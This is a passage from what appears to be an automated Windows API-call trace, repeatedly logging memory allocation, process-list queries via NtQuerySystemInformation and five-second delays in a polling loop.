NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 